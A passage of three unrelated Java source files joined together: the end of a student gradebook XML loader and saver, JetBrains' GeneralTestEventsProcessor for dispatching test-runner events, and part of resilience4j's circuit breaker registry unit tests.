boolean isLastName = false;
boolean isPsuedoName = false;
boolean isGhostName = false;
// A SAX callback method which finds the start of an XML element
public void startElement (String uri, String localName, String qName,
Attributes attributes) throws SAXException {
if (qName.equalsIgnoreCase("firstName")) {
isFirstName = true;
}
if (qName.equalsIgnoreCase("lastName")) {
isLastName = true;
}
if (qName.equalsIgnoreCase("psuedoName")) {
isPsuedoName = true;
}
if (qName.equalsIgnoreCase("ghostName")) {
isGhostName = true;
}
}
// A SAX callback method which finds the end of an XML element
public void endElement(String uri, String localName,
String qName) throws SAXException {
// adds a student to course when it reaches </student>
if (qName.equalsIgnoreCase("student")) {
course.addStudentXML(firstName, lastName, psuedoName);
}
}
// A SAX callback method which contains all the characters in an element
public void characters(char ch[], int start, int length)
throws SAXException {
//If the element is <name>
if (isFirstName) {
firstName = new String(ch, start, length);
isFirstName = false; // must declare name false for next search
}
//If the element is <name>
if (isLastName) {
lastName = new String(ch, start, length);
isLastName = false; // must declare name false for next search
}
//If the element is <psuedoName>
if (isPsuedoName) {
psuedoName = new String(ch, start, length);
isPsuedoName = false;
}
if (isGhostName) {
course.addGhostStudentXML(new String(ch, start, length));
isGhostName = false;
}
}
};
saxParser.parse(file, handler);
} catch (Exception e) {
e.printStackTrace();
}
}
private static void loadAssignmentInfo(File file) {
try {
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser saxParser = factory.newSAXParser();
DefaultHandler handler = new DefaultHandler()
{
String assignmentName;
int assignmentWorth;
String currentCategoryName;
int currentCategoryIndex = 0;
boolean isCategoryName = false;
boolean isAssignmentName = false;
boolean isWorth = false;
boolean isGrade = false;
int studentIndex = 0;
int totalStudents = course.getNumberOfStudents();
// A SAX callback method which finds the start of an XML element
public void startElement (String uri, String localName, String qName,
Attributes attributes) throws SAXException {
if (qName.equalsIgnoreCase("categoryName")) {
isCategoryName = true;
}
if (qName.equalsIgnoreCase("assignmentName")) {
isAssignmentName = true;
}
if (qName.equalsIgnoreCase("worth")) {
isWorth = true;
}
if (qName.equalsIgnoreCase("grade")) {
isGrade = true;
}
}
// A SAX callback method which finds the end of an XML element
public void endElement(String uri, String localName,
String qName) throws SAXException {
if (qName.equalsIgnoreCase("assignment")) {
studentIndex = 0;
}
}
// A SAX callback method which contains all the characters in an element
public void characters(char ch[], int start, int length)
throws SAXException {
if (isCategoryName) {
currentCategoryName = new String(ch, start, length);
course.addAssignmentCategory(currentCategoryName);
currentCategoryIndex = course.getAssignmentCategoryIndex(currentCategoryName);
isCategoryName = false;
}
if (isAssignmentName) {
assignmentName = new String(ch, start, length);
isAssignmentName = false;
}
if (isWorth) {
assignmentWorth = Integer.parseInt(new String(ch, start, length));
course.getAssignmentCategory(currentCategoryIndex).addAssignment(assignmentName, assignmentWorth);
isWorth = false;
}
if (isGrade) {
AssignmentCategory currentCategory = course.getAssignmentCategory(currentCategoryIndex);
Assignment currentAssignment = currentCategory.getAssignment(currentCategory.getAssignmentIndex(assignmentName));
String gradeValue = new String(ch, start, length);
String pseudoName = null;
boolean student = false;
if (studentIndex < totalStudents) {
pseudoName = course.getStudent(studentIndex).getPseudoName();
student = true;
}
else {
pseudoName = course.getGhostStudent(studentIndex - totalStudents).getPseudoName();
}
if (gradeValue.equals("null") || gradeValue.equals("")) {
currentAssignment.setGrade(pseudoName, null, student);
}
else {
currentAssignment.setGrade(pseudoName, Integer.parseInt(gradeValue), student);
}
isGrade = false;
studentIndex ++;
}
}
};
saxParser.parse(file, handler);
} catch (Exception e) {
e.printStackTrace();
}
}
public static MyCourse loadXML(File file) {
course = loadCourseInfo(file);
loadStudentInfo(file);
loadAssignmentInfo(file);
return course;
}
public static void saveXML(MyCourse tmpCourse) {
String fileDir = "gradebooks" + File.separator + tmpCourse.getIdentifier() + ".xml";
File file = new File(fileDir);
if (file.exists())
file.delete();
try {
file.createNewFile();
} catch (IOException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
Writer writer = null;
try {
writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(file), "utf-8"));
//Add header of XML file
writer.write("<class id=\""+file.toString()+"\">\n");
//FIXME use non-OS-specific newlines
//Add general course information to file
writer.write("\t<courseName>" + tmpCourse.getName() + "</courseName>\n");
writer.write("\t<courseID>" + tmpCourse.getCourseID() + "</courseID>\n");
writer.write("\t<courseNumber>" + tmpCourse.getCourseNumber() + "</courseNumber>\n");
writer.write("\t<section>" + tmpCourse.getSection() + "</section>\n");
writer.write("\t<building>" + tmpCourse.getBuilding() + "</building>\n");
writer.write("\t<roomID>" + tmpCourse.getRoomID() + "</roomID>\n");
writer.write("\t<meetingTime>" + tmpCourse.getMeetingTime() + "</meetingTime>\n");
writer.write("\t<semester>" + tmpCourse.getSemester() + "</semester>\n");
if (tmpCourse.getLastAssignmentIndex() != null && tmpCourse.getLastCategoryIndex() != null
&& tmpCourse.getLastCategoryIndex() < tmpCourse.getNumberOfAssignmentCategories()
&& tmpCourse.getLastAssignmentIndex() < tmpCourse.getCategories().get(tmpCourse.getLastCategoryIndex()).getNumberOfAssignments()) {
writer.write("\t<index>" + tmpCourse.getLastAssignmentIndex() + "</index>\n");
writer.write("\t<index>" + tmpCourse.getLastCategoryIndex() + "</index>\n\n");
}
else {
writer.write("\t<index>null</index>\n");
writer.write("\t<index>null</index>\n\n");
}
//Add student information
for (int i = 0; i < tmpCourse.getNumberOfStudents(); i++) {
writer.write("\t<student>\n");
writer.write("\t\t<firstName>" + tmpCourse.getStudent(i).getFirstName() + "</firstName>\n");
writer.write("\t\t<lastName>" + tmpCourse.getStudent(i).getLastName() + "</lastName>\n");
writer.write("\t\t<psuedoName>" + tmpCourse.getStudent(i).getPseudoName() + "</psuedoName>\n");
writer.write("\t</student>\n");
}
writer.write("\t<!-- Ghost Students -->\n");
//Add ghost students
for (int i = 0; i <tmpCourse.getNumberOfGhostStudents(); i++) {
writer.write("\t<ghostStudent>\n");
writer.write("\t\t<ghostName>" + tmpCourse.getGhostStudent(i).getPseudoName() + "</ghostName>\n");
writer.write("\t</ghostStudent>\n");
}
//Add assignment information
for (int i = 0; i < tmpCourse.getNumberOfAssignmentCategories(); i++) {
writer.write("\t<category>\n");
writer.write("\t\t<categoryName>" + tmpCourse.getAssignmentCategory(i).getName() + "</categoryName>\n");
for (int j = 0; j < tmpCourse.getAssignmentCategory(i).getNumberOfAssignments(); j++) {
writer.write("\t\t<assignment>\n");
writer.write("\t\t\t<assignmentName>" + tmpCourse.getAssignmentCategory(i).getAssignment(j).getName() + "</assignmentName>\n");
writer.write("\t\t\t<worth>" + tmpCourse.getAssignmentCategory(i).getAssignment(j).getWorth() + "</worth>\n");
for (int k = 0; k < tmpCourse.getNumberOfStudents(); k++) {
writer.write("\t\t\t<grade id=\"" + tmpCourse.getStudent(k).getFullName() + "\">" +
tmpCourse.getAssignmentCategory(i).getAssignment(j).getGrade(tmpCourse.getStudent(k).getPseudoName()) + "</grade>\n");
}
writer.write("\t\t\t<!-- Ghost Students -->\n");
for (int k = 0; k < tmpCourse.getNumberOfGhostStudents(); k++) {
writer.write("\t\t\t<grade id=\"" + tmpCourse.getGhostStudent(k).getPseudoName() + "\">" +
tmpCourse.getAssignmentCategory(i).getAssignment(j).getGrade(tmpCourse.getGhostStudent(k).getPseudoName()) + "</grade>\n");
}
writer.write("\t\t</assignment>\n");
}
writer.write("\t</category>\n");
}
writer.write("</class>");
} catch (IOException e){
System.out.println(e);
} finally {
try {writer.close();} catch (Exception e) {
System.out.println(e);
}
}
}
public static Boolean archiveCourse(MyCourse tmpCourse) {
String fileDir = "gradebooks" + File.separator + tmpCourse.getIdentifier() + ".xml";
String desiredDir = "gradebooks" + File.separator + "archive" + File.separator + tmpCourse.getIdentifier() + ".xml";
File desired = new File (desiredDir);
if (desired.exists())
desired.delete();
try {
File file = new File(fileDir);
if (file.renameTo(desired))
return true;
else
return false;
} catch(Exception e) {
e.printStackTrace();
}
return false;
}
/*
public static void main(String argv[]) {
course = loadXML(new File("structure.xml"));
course.removeStudent(7);
saveXML(course, new File("output.xml"));
}*/
}
|
|
/*
* Copyright 2000-2015 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.execution.testframework.sm.runner;
import com.intellij.execution.testframework.sm.SMTestRunnerConnectionUtil;
import com.intellij.execution.testframework.sm.runner.events.*;
import com.intellij.openapi.Disposable;
import com.intellij.openapi.application.Application;
import com.intellij.openapi.application.ApplicationManager;
import com.intellij.openapi.diagnostic.Logger;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.util.Condition;
import com.intellij.openapi.util.Conditions;
import com.intellij.openapi.util.Key;
import com.intellij.util.Processor;
import com.intellij.util.containers.HashMap;
import com.intellij.util.containers.TransferToEDTQueue;
import com.intellij.util.messages.MessageBusConnection;
import com.intellij.util.ui.UIUtil;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import javax.swing.*;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
/**
* Processes events of test runner in general text-based form.
* <p/>
* Test name should be unique for all suites - e.g. it can consist of a suite name and a name of a test method.
*
* @author: Roman Chernyatchik
*/
public abstract class GeneralTestEventsProcessor implements Disposable {
private static final Logger LOG = Logger.getInstance(GeneralTestEventsProcessor.class.getName());
protected final SMTRunnerEventsListener myEventPublisher;
private final String myTestFrameworkName;
private final Project myProject;
private TransferToEDTQueue<Runnable> myTransferToEDTQueue =
new TransferToEDTQueue<Runnable>("SM queue", new Processor<Runnable>() {
@Override
public boolean process(Runnable runnable) {
runnable.run();
return true;
}
}, getDisposedCondition(), 300);
protected List<SMTRunnerEventsListener> myListenerAdapters = new ArrayList<SMTRunnerEventsListener>();
public GeneralTestEventsProcessor(Project project, @NotNull String testFrameworkName) {
myProject = project;
myEventPublisher = project.getMessageBus().syncPublisher(SMTRunnerEventsListener.TEST_STATUS);
myTestFrameworkName = testFrameworkName;
}
// tree construction events
public void onRootPresentationAdded(String rootName, String comment, String rootLocation) {}
public void onSuiteTreeNodeAdded(String testName, String locationHint) { }
public void onSuiteTreeStarted(String suiteName, String locationHint) { }
public void onSuiteTreeEnded(String suiteName) { }
public void onBuildTreeEnded() { }
// progress events
public abstract void onStartTesting();
protected void fireOnTestingStarted(SMTestProxy.SMRootTestProxy node) {
myEventPublisher.onTestingStarted(node);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestingStarted(node);
}
}
public abstract void onTestsCountInSuite(final int count);
protected void fireOnTestsCountInSuite(int count) {
myEventPublisher.onTestsCountInSuite(count);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestsCountInSuite(count);
}
}
public abstract void onTestStarted(@NotNull TestStartedEvent testStartedEvent);
protected void fireOnTestStarted(SMTestProxy testProxy) {
myEventPublisher.onTestStarted(testProxy);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestStarted(testProxy);
}
}
public abstract void onTestFinished(@NotNull TestFinishedEvent testFinishedEvent);
protected void fireOnTestFinished(SMTestProxy testProxy) {
myEventPublisher.onTestFinished(testProxy);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestFinished(testProxy);
}
}
public abstract void onTestFailure(@NotNull TestFailedEvent testFailedEvent);
protected void fireOnTestFailed(SMTestProxy testProxy) {
myEventPublisher.onTestFailed(testProxy);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestFailed(testProxy);
}
}
public abstract void onTestIgnored(@NotNull TestIgnoredEvent testIgnoredEvent);
protected void fireOnTestIgnored(SMTestProxy testProxy) {
myEventPublisher.onTestIgnored(testProxy);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestIgnored(testProxy);
}
}
public abstract void onTestOutput(@NotNull TestOutputEvent testOutputEvent);
public abstract void onSuiteStarted(@NotNull TestSuiteStartedEvent suiteStartedEvent);
protected void fireOnSuiteStarted(SMTestProxy newSuite) {
myEventPublisher.onSuiteStarted(newSuite);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onSuiteStarted(newSuite);
}
}
public abstract void onSuiteFinished(@NotNull TestSuiteFinishedEvent suiteFinishedEvent);
protected void fireOnSuiteFinished(SMTestProxy mySuite) {
myEventPublisher.onSuiteFinished(mySuite);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onSuiteFinished(mySuite);
}
}
public abstract void onUncapturedOutput(@NotNull String text, Key outputType);
public abstract void onError(@NotNull String localizedMessage, @Nullable String stackTrace, boolean isCritical);
protected static void fireOnTestsReporterAttached(SMTestProxy.SMRootTestProxy rootNode) {
rootNode.setTestsReporterAttached();
}
public abstract void onFinishTesting();
protected void fireOnTestingFinished(SMTestProxy.SMRootTestProxy root) {
myEventPublisher.onTestingFinished(root);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onTestingFinished(root);
}
}
// custom progress statistics
/**
* @param categoryName If isn't empty then progress statistics will use only custom start/failed events.
* If name is null statistics will be switched to normal mode
* @param testCount 0 will be considered as unknown tests number
*/
public void onCustomProgressTestsCategory(@Nullable final String categoryName,
final int testCount) {
addToInvokeLater(new Runnable() {
public void run() {
myEventPublisher.onCustomProgressTestsCategory(categoryName, testCount);
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onCustomProgressTestsCategory(categoryName, testCount);
}
}
});
}
public void onCustomProgressTestStarted() {
addToInvokeLater(new Runnable() {
public void run() {
myEventPublisher.onCustomProgressTestStarted();
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onCustomProgressTestStarted();
}
}
});
}
public void onCustomProgressTestFinished() {
addToInvokeLater(new Runnable() {
public void run() {
myEventPublisher.onCustomProgressTestFinished();
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onCustomProgressTestFinished();
}
}
});
}
public void onCustomProgressTestFailed() {
addToInvokeLater(new Runnable() {
public void run() {
myEventPublisher.onCustomProgressTestFailed();
for (SMTRunnerEventsListener adapter : myListenerAdapters) {
adapter.onCustomProgressTestFailed();
}
}
});
}
// workflow/service methods
public abstract void onTestsReporterAttached();
public abstract void setLocator(@NotNull SMTestLocator locator);
public void addEventsListener(@NotNull SMTRunnerEventsListener listener) {
myListenerAdapters.add(listener);
}
public abstract void setPrinterProvider(@NotNull TestProxyPrinterProvider printerProvider);
@Override
public void dispose() {
if (!ApplicationManager.getApplication().isUnitTestMode()) {
UIUtil.invokeAndWaitIfNeeded(new Runnable() {
@Override
public void run() {
myTransferToEDTQueue.drain();
}
});
}
}
protected void disconnectListeners() {
myListenerAdapters.clear();
}
public Condition getDisposedCondition() {
return Conditions.alwaysFalse();
}
public void addToInvokeLater(final Runnable runnable) {
final Application application = ApplicationManager.getApplication();
if (application.isUnitTestMode()) {
UIUtil.invokeLaterIfNeeded(runnable);
}
else if (application.isHeadlessEnvironment() || SwingUtilities.isEventDispatchThread()) {
runnable.run();
}
else {
myTransferToEDTQueue.offer(runnable);
}
}
public void stopEventProcessing() {
UIUtil.invokeLaterIfNeeded(new Runnable() {
@Override
public void run() {
myTransferToEDTQueue.drain();
}
});
}
protected static <T> boolean isTreeComplete(Collection<T> runningTests, SMTestProxy.SMRootTestProxy rootNode) {
if (!runningTests.isEmpty()) {
return false;
}
List<? extends SMTestProxy> children = rootNode.getChildren();
for (SMTestProxy child : children) {
if (!child.isFinal() || child.wasTerminated()) {
return false;
}
}
return true;
}
protected void logProblem(final String msg) {
logProblem(LOG, msg, myTestFrameworkName);
}
protected void logProblem(String msg, boolean throwError) {
logProblem(LOG, msg, throwError, myTestFrameworkName);
}
public static String getTFrameworkPrefix(final String testFrameworkName) {
return "[" + testFrameworkName + "]: ";
}
public static void logProblem(final Logger log, final String msg, final String testFrameworkName) {
logProblem(log, msg, SMTestRunnerConnectionUtil.isInDebugMode(), testFrameworkName);
}
public static void logProblem(final Logger log, final String msg, boolean throwError, final String testFrameworkName) {
final String text = getTFrameworkPrefix(testFrameworkName) + msg;
if (throwError) {
log.error(text);
}
else {
log.warn(text);
}
}
}
|
|
/*
*
* Copyright 2016 Robert Winkler
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*
*/
package io.github.resilience4j.circuitbreaker;
import io.github.resilience4j.core.EventProcessor;
import io.github.resilience4j.core.Registry;
import io.github.resilience4j.core.registry.*;
import org.junit.Test;
import java.util.*;
import static org.assertj.core.api.Assertions.assertThatThrownBy;
import static org.assertj.core.api.BDDAssertions.assertThat;
public class CircuitBreakerRegistryTest {
private static Optional<EventProcessor<?>> getEventProcessor(
Registry.EventPublisher<CircuitBreaker> eventPublisher) {
if (eventPublisher instanceof EventProcessor<?>) {
return Optional.of((EventProcessor<?>) eventPublisher);
}
return Optional.empty();
}
@Test
public void shouldInitRegistryTags() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.ofDefaults();
Map<String, CircuitBreakerConfig> circuitBreakerConfigs = Collections
.singletonMap("default", circuitBreakerConfig);
CircuitBreakerRegistry registry = CircuitBreakerRegistry.of(circuitBreakerConfigs,new NoOpCircuitBreakerEventConsumer(),Map.of("Tag1Key","Tag1Value"));
assertThat(registry.getTags()).isNotEmpty();
assertThat(registry.getTags()).containsOnly(Map.entry("Tag1Key","Tag1Value"));
}
@Test
public void shouldReturnTheCorrectName() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker).isNotNull();
assertThat(circuitBreaker.getName()).isEqualTo("testName");
}
@Test
public void shouldBeTheSameCircuitBreaker() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker).isSameAs(circuitBreaker2);
assertThat(circuitBreakerRegistry.getAllCircuitBreakers()).hasSize(1);
}
@Test
public void shouldBeNotTheSameCircuitBreaker() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker("otherTestName");
assertThat(circuitBreaker).isNotSameAs(circuitBreaker2);
assertThat(circuitBreakerRegistry.getAllCircuitBreakers()).hasSize(2);
}
@Test
public void noTagsByDefault() {
CircuitBreaker circuitBreaker = CircuitBreakerRegistry.ofDefaults()
.circuitBreaker("testName");
assertThat(circuitBreaker.getTags()).hasSize(0);
}
@Test
public void tagsOfRegistryAddedToInstance() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.ofDefaults();
Map<String, CircuitBreakerConfig> circuitBreakerConfigs = Collections
.singletonMap("default", circuitBreakerConfig);
Map<String, String> circuitBreakerTags = Map.of("key1", "value1", "key2", "value2");
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(circuitBreakerConfigs, circuitBreakerTags);
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker.getTags()).containsAllEntriesOf(circuitBreakerTags);
}
@Test
public void tagsAddedToInstance() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
Map<String, String> retryTags = Map.of("key1", "value1", "key2", "value2");
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("testName", retryTags);
assertThat(circuitBreaker.getTags()).containsAllEntriesOf(retryTags);
}
@Test
public void tagsOfRetriesShouldNotBeMixed() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.ofDefaults();
Map<String, String> circuitBreakerTags = Map.of("key1", "value1", "key2", "value2");
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("testName", circuitBreakerConfig, circuitBreakerTags);
Map<String, String> circuitBreakerTags2 = Map.of("key3", "value3", "key4", "value4");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry
.circuitBreaker("otherTestName", circuitBreakerConfig, circuitBreakerTags2);
assertThat(circuitBreaker.getTags()).containsAllEntriesOf(circuitBreakerTags);
assertThat(circuitBreaker2.getTags()).containsAllEntriesOf(circuitBreakerTags2);
}
@Test
public void tagsOfInstanceTagsShouldOverrideRegistryTags() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.ofDefaults();
Map<String, CircuitBreakerConfig> circuitBreakerConfigs = Collections
.singletonMap("default", circuitBreakerConfig);
Map<String, String> circuitBreakerTags = Map.of("key1", "value1", "key2", "value2");
Map<String, String> instanceTags = Map.of("key1", "value3", "key4", "value4");
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(circuitBreakerConfigs, circuitBreakerTags);
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("testName", circuitBreakerConfig, instanceTags);
Map<String, String> expectedTags = Map.of("key1", "value3", "key2", "value2", "key4", "value4");
assertThat(circuitBreaker.getTags()).containsAllEntriesOf(expectedTags);
}
@Test
public void testCreateWithDefaultConfiguration() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(CircuitBreakerConfig.ofDefaults());
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker("otherTestName");
assertThat(circuitBreaker).isNotSameAs(circuitBreaker2);
assertThat(circuitBreakerRegistry.getAllCircuitBreakers()).hasSize(2);
}
@Test
public void testCreateWithCustomConfiguration() {
float failureRate = 30f;
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(failureRate).build();
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(circuitBreakerConfig);
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker.getCircuitBreakerConfig().getFailureRateThreshold())
.isEqualTo(failureRate);
}
@Test
public void testCreateWithConfigurationMap() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(30f).build();
CircuitBreakerConfig customCircuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(40f).build();
Map<String, CircuitBreakerConfig> configs = new HashMap<>();
configs.put("default", circuitBreakerConfig);
configs.put("custom", customCircuitBreakerConfig);
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.of(configs);
assertThat(circuitBreakerRegistry.getDefaultConfig()).isNotNull();
assertThat(circuitBreakerRegistry.getDefaultConfig().getFailureRateThreshold())
.isEqualTo(30f);
assertThat(circuitBreakerRegistry.getConfiguration("custom")).isNotEmpty();
}
@Test
public void testCreateWithSingleRegistryEventConsumer() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(CircuitBreakerConfig.ofDefaults(), new NoOpCircuitBreakerEventConsumer());
getEventProcessor(circuitBreakerRegistry.getEventPublisher())
.ifPresent(eventProcessor -> assertThat(eventProcessor.hasConsumers()).isTrue());
}
@Test
public void testCreateWithMultipleRegistryEventConsumer() {
List<RegistryEventConsumer<CircuitBreaker>> registryEventConsumers = new ArrayList<>();
registryEventConsumers.add(new NoOpCircuitBreakerEventConsumer());
registryEventConsumers.add(new NoOpCircuitBreakerEventConsumer());
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(CircuitBreakerConfig.ofDefaults(), registryEventConsumers);
getEventProcessor(circuitBreakerRegistry.getEventPublisher())
.ifPresent(eventProcessor -> assertThat(eventProcessor.hasConsumers()).isTrue());
}
@Test
public void testCreateWithConfigurationMapWithSingleRegistryEventConsumer() {
Map<String, CircuitBreakerConfig> configs = new HashMap<>();
configs.put("custom", CircuitBreakerConfig.ofDefaults());
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(configs, new NoOpCircuitBreakerEventConsumer());
getEventProcessor(circuitBreakerRegistry.getEventPublisher())
.ifPresent(eventProcessor -> assertThat(eventProcessor.hasConsumers()).isTrue());
}
@Test
public void testCreateWithConfigurationMapWithMultiRegistryEventConsumer() {
Map<String, CircuitBreakerConfig> configs = new HashMap<>();
configs.put("custom", CircuitBreakerConfig.ofDefaults());
List<RegistryEventConsumer<CircuitBreaker>> registryEventConsumers = new ArrayList<>();
registryEventConsumers.add(new NoOpCircuitBreakerEventConsumer());
registryEventConsumers.add(new NoOpCircuitBreakerEventConsumer());
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(configs, registryEventConsumers);
getEventProcessor(circuitBreakerRegistry.getEventPublisher())
.ifPresent(eventProcessor -> assertThat(eventProcessor.hasConsumers()).isTrue());
}
@Test
public void testAddConfiguration() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
float failureRate = 30f;
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(failureRate).build();
circuitBreakerRegistry.addConfiguration("someSharedConfig", circuitBreakerConfig);
assertThat(circuitBreakerRegistry.getDefaultConfig()).isNotNull();
assertThat(circuitBreakerRegistry.getDefaultConfig().getFailureRateThreshold())
.isEqualTo(50f);
assertThat(circuitBreakerRegistry.getConfiguration("someSharedConfig")).isNotEmpty();
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("name", "someSharedConfig");
assertThat(circuitBreaker.getCircuitBreakerConfig()).isEqualTo(circuitBreakerConfig);
assertThat(circuitBreaker.getCircuitBreakerConfig().getFailureRateThreshold())
.isEqualTo(failureRate);
}
@Test
public void testCreateWithConfigurationMapWithoutDefaultConfig() {
float failureRate = 30f;
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(failureRate).build();
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(Collections.singletonMap("someSharedConfig", circuitBreakerConfig));
assertThat(circuitBreakerRegistry.getDefaultConfig()).isNotNull();
assertThat(circuitBreakerRegistry.getDefaultConfig().getFailureRateThreshold())
.isEqualTo(50f);
assertThat(circuitBreakerRegistry.getConfiguration("someSharedConfig")).isNotEmpty();
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("name", "someSharedConfig");
assertThat(circuitBreaker.getCircuitBreakerConfig()).isEqualTo(circuitBreakerConfig);
assertThat(circuitBreaker.getCircuitBreakerConfig().getFailureRateThreshold())
.isEqualTo(failureRate);
}
@Test
public void testCreateWithNullConfig() {
assertThatThrownBy(() -> CircuitBreakerRegistry.of((CircuitBreakerConfig) null))
.isInstanceOf(NullPointerException.class).hasMessage("Config must not be null");
}
@Test
public void testCreateUsingBuilderWithDefaultConfig() {
CircuitBreakerRegistry circuitBreakerRegistry =
CircuitBreakerRegistry.custom().withCircuitBreakerConfig(CircuitBreakerConfig.ofDefaults()).build();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker("otherTestName");
assertThat(circuitBreaker).isNotSameAs(circuitBreaker2);
assertThat(circuitBreakerRegistry.getAllCircuitBreakers()).hasSize(2);
}
@Test
public void testCreateUsingBuilderWithCustomConfig() {
float failureRate = 30f;
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(failureRate).build();
CircuitBreakerRegistry circuitBreakerRegistry =
CircuitBreakerRegistry.custom().withCircuitBreakerConfig(circuitBreakerConfig).build();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker.getCircuitBreakerConfig().getFailureRateThreshold())
.isEqualTo(failureRate);
}
@Test
public void testCreateUsingBuilderWithoutDefaultConfig() {
float failureRate = 30f;
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(failureRate).build();
CircuitBreakerRegistry circuitBreakerRegistry =
CircuitBreakerRegistry.custom().addCircuitBreakerConfig("someSharedConfig", circuitBreakerConfig).build();
assertThat(circuitBreakerRegistry.getDefaultConfig()).isNotNull();
assertThat(circuitBreakerRegistry.getDefaultConfig().getFailureRateThreshold())
.isEqualTo(50f);
assertThat(circuitBreakerRegistry.getConfiguration("someSharedConfig")).isNotEmpty();
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("name", "someSharedConfig");
assertThat(circuitBreaker.getCircuitBreakerConfig()).isEqualTo(circuitBreakerConfig);
assertThat(circuitBreaker.getCircuitBreakerConfig().getFailureRateThreshold())
.isEqualTo(failureRate);
}
@Test(expected = IllegalArgumentException.class)
public void testAddMultipleDefaultConfigUsingBuilderShouldThrowException() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(30f).build();
CircuitBreakerRegistry.custom().addCircuitBreakerConfig("default", circuitBreakerConfig).build();
}
@Test
